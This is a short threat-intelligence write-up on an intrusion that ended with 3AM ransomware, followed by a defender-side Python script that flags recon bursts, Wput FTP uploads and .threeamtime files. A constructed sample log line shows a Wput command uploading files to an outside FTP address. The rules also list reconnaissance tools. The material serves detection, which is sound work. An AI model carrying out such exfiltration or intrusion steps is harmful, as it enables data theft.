Diving into the details
- The intrusion begins with the gpresult command, used to retrieve the policy settings applied for a particular user and system.
- The actors also deployed several Cobalt Strike components and attempted to gain higher privileges on the computer using PsExec.
- They then ran commands such as whoami, netstat, quser, and net share for reconnaissance.
- To maintain persistence, they created a new user account and used the Wput tool to transmit the victims’ files to their FTP server.
- In the final stage, after LockBit was blocked on the first attempt, the attackers fell back to the 3AM ransomware, which was deployed on three systems on the organization’s network.
Written in Rust, the 3AM ransomware takes its name from the .threeamtime extension it appends to encrypted files; the ransom note also mentions the name.
The ransomware is currently used in a limited number of attacks and its exact origins remain unknown. However, the fact that a LockBit affiliate used 3AM as a fallback suggests it may attract the interest of other attackers and appear in more attacks in the future.
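As an added defender-side example (not code from the original report), the following Python script triages constructed endpoint event lines for the behaviours described above: a burst of the listed reconnaissance commands on one host, a Wput upload to an FTP URL, and files written with the .threeamtime extension. The log format, the 10-minute grouping window, and all hostnames, paths and sample values are assumptions.

```python
"""Triage constructed endpoint events for the 3AM chain described above:
recon burst, Wput FTP upload, and .threeamtime file writes."""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

RECON = {"gpresult", "whoami", "netstat", "quser", "net"}   # net only counts with "share"
WINDOW = timedelta(minutes=10)   # assumed window for grouping recon commands
LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<ev>\S+) (?P<rest>.*)$")

def triage(lines):
    # Returns sorted (host, finding) tuples for the behaviours in the report.
    findings = set()
    recon = defaultdict(list)                      # host -> [(ts, command)]
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue                               # skip unparsable lines
        ts = datetime.fromisoformat(m["ts"])
        host, ev, rest = m["host"], m["ev"], m["rest"].lower()
        if ev == "process_create":
            img = re.search(r"image=(\S+)", rest)
            name = ntpath.basename(img.group(1)).removesuffix(".exe") if img else ""
            if name in RECON and (name != "net" or " share" in rest):
                recon[host].append((ts, name))
            if name == "wput" and "ftp://" in rest:
                findings.add((host, "wput_ftp_upload"))
        elif ev == "file_create" and rest.endswith(".threeamtime"):
            findings.add((host, "threeamtime_extension"))
    for host, events in recon.items():
        events.sort()
        for i, (t0, _) in enumerate(events):       # >=3 distinct recon cmds in WINDOW
            if len({n for t, n in events[i:] if t - t0 <= WINDOW}) >= 3:
                findings.add((host, "recon_burst"))
                break
    return sorted(findings)

SAMPLE = [  # constructed sample events, not taken from the report
    "2024-01-01T03:00:01 host=WS01 event=process_create image=C:\\Windows\\System32\\gpresult.exe cmdline=gpresult /z",
    "2024-01-01T03:01:10 host=WS01 event=process_create image=C:\\Windows\\System32\\whoami.exe cmdline=whoami",
    "2024-01-01T03:02:30 host=WS01 event=process_create image=C:\\Windows\\System32\\quser.exe cmdline=quser",
    "2024-01-01T03:02:45 host=WS01 event=process_create image=C:\\Windows\\System32\\net.exe cmdline=net share",
    "2024-01-01T03:20:00 host=WS01 event=process_create image=C:\\Tools\\wput.exe cmdline=wput docs.zip ftp://203.0.113.5/",
    "2024-01-01T04:00:00 host=FS02 event=file_create path=D:\\data\\report.docx.threeamtime",
    "2024-01-01T04:05:00 host=WS03 event=process_create image=C:\\Windows\\System32\\whoami.exe cmdline=whoami",
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE):
        print(host, finding)
```

A single whoami on WS03 is deliberately not flagged; the burst rule needs at least three distinct commands from the list within the window.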